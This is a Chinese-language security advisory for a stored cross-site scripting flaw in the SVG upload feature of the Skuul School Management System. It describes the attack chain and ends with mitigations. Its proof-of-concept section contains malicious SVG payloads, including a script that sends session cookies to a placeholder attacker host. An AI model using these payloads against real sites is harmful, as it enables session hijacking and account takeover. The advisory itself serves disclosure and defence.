CVE-2025-13784 Skuul学校管理系统SVG文件处理器跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-13784

漏洞类型

跨站脚本(XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Skuul School Management System

漏洞概述

CVE-2025-13784是存在于Skuul学校管理系统中的一种存储型跨站脚本漏洞。该漏洞影响Skuul School Management System 2.6.5及之前版本。攻击者可以利用SVG文件处理功能在/dashboard/schools/1/edit路径下注入恶意脚本代码。由于该漏洞需要高权限用户交互才能触发，CVSS评分仅为2.4，属于低危漏洞。然而，存储型XSS漏洞可能在管理员查看相关页面时自动执行，可能导致会话劫持、敏感信息窃取或进一步的权限提升攻击。漏洞发现者已向厂商报告但未获得回应，公开的漏洞利用可能已被广泛知晓。建议使用该系统的用户尽快采取防御措施，避免受到潜在攻击。

技术细节

该漏洞属于存储型跨站脚本（Stored XSS）漏洞，位于Skuul学校管理系统的SVG文件上传处理功能中。具体受影响的端点是/dashboard/schools/1/edit页面中的SVG文件处理器。攻击者通过上传包含恶意JavaScript代码的SVG文件，利用SVG标签可包含脚本的特性，在文件被服务器存储后，当其他用户访问或查看该SVG文件时，嵌入的恶意脚本将在受害者浏览器上下文中执行。SVG格式支持<script>标签和事件处理器属性（如onload、onerror等），使得攻击者可以绕过常规的输入过滤。由于系统未对上传的SVG文件内容进行充分的HTML转义或内容类型验证，导致恶意代码被持久化存储在服务器上。攻击成功需要受害者具有一定的访问权限（高权限），且需要用户交互触发（如查看上传的文件）。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统使用Skuul School Management System，确认版本≤2.6.5

STEP 2

认证与访问

攻击者获取系统高权限账户（如学校管理员）登录凭证并访问/dashboard/schools/1/edit端点

STEP 3

恶意文件上传

通过SVG文件上传功能，上传包含XSS payload的恶意SVG文件（如包含<script>标签或事件处理器）

STEP 4

持久化存储

恶意SVG文件被服务器存储，未经过充分的输入验证和安全过滤

STEP 5

触发执行

当其他用户（如同校管理员）访问或查看该SVG文件时，嵌入的JavaScript代码在其浏览器中自动执行

STEP 6

攻击完成

攻击者通过XSS成功窃取会话Cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2025-13784: Skuul School Management System XSS -->
<!-- Malicious SVG file content -->
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">
    alert('XSS - CVE-2025-13784');
    // Steal session cookies
    document.location='https://attacker.com/steal?cookie='+document.cookie;
  </script>
</svg>

<!-- Alternative PoC using onload event -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <rect width="100" height="100" fill="red"/>
</svg>

<!-- Attack Vector -->
<!-- 1. Upload malicious SVG file through /dashboard/schools/1/edit -->
<!-- 2. When admin views the uploaded SVG, XSS payload executes -->
<!-- 3. Attacker can steal session tokens or perform actions as admin -->

影响范围

Skuul School Management System <= 2.6.5

防御指南

临时缓解措施

在厂商发布修复版本之前，建议临时禁用SVG文件上传功能，或配置Web应用防火墙（WAF）规则过滤包含<script>标签和事件处理器属性的SVG文件上传请求。同时限制高权限账户的SVG文件上传权限，并对上传目录设置禁止执行脚本的服务器配置。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13784
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13784
3 Details https://www.cvedetails.com/cve/CVE-2025-13784/
4 VulDB https://vuldb.com/cve/CVE-2025-13784
5 Link https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff
6 Link https://vuldb.com/?ctiid.333788
7 Link https://vuldb.com/?id.333788
8 Link https://vuldb.com/?submit.689012
9 Link https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff
10 Link https://vuldb.com/?submit.689012